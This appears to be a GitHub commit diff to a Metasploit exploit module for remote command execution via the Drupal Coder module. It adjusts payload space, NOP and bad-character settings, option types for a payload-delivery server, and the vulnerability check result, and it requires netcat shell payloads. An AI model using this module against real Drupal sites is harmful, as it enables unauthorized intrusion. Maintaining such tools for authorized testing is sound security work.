Skip to content

Commit 780e83d

Browse files
committed
Fix for Opt params and Space limits
1 parent 7e9c5f9 commit 780e83d

File tree

1 file changed

+9
-7
lines changed

1 file changed

+9
-7
lines changed

modules/exploits/unix/webapp/drupal_coder_exec.rb

Lines changed: 9 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -37,11 +37,13 @@ def initialize(info={})
3737
'Privileged' => false,
3838
'Payload' =>
3939
{
40-
'BadChars' => "\x00\x2f",
41-
'Compat' =>
40+
'Space' => 225,
41+
'DisableNops' => true,
42+
'BadChars' => "\x00\x2f",
43+
'Compat' =>
4244
{
43-
'PayloadType' => 'cmd',
44-
'RequiredCmd' => 'netcat netcat-e'
45+
'PayloadType' => 'cmd',
46+
'RequiredCmd' => 'netcat netcat-e'
4547
},
4648
},
4749
'Platform' => ['unix'],
@@ -54,8 +56,8 @@ def initialize(info={})
5456
register_options(
5557
[
5658
OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/']),
57-
OptString.new('SRVHOST', [true, 'Bogus web server host to receive request from target and deliver payload']),
58-
OptString.new('SRVPORT', [true, 'Bogus web server port to listen'])
59+
OptAddress.new('SRVHOST', [true, 'Bogus web server host to receive request from target and deliver payload']),
60+
OptPort.new('SRVPORT', [true, 'Bogus web server port to listen'])
5961
]
6062
)
6163
end
@@ -66,7 +68,7 @@ def check
6668
'uri' => normalize_uri(target_uri.path, 'sites/all/modules/coder/coder_upgrade/scripts/coder_upgrade.run.php'),
6769
)
6870
if res && res.code == 200
69-
Exploit::CheckCode::Vulnerable
71+
Exploit::CheckCode::Appears
7072
else
7173
Exploit::CheckCode::Safe
7274
end

0 commit comments

Comments
 (0)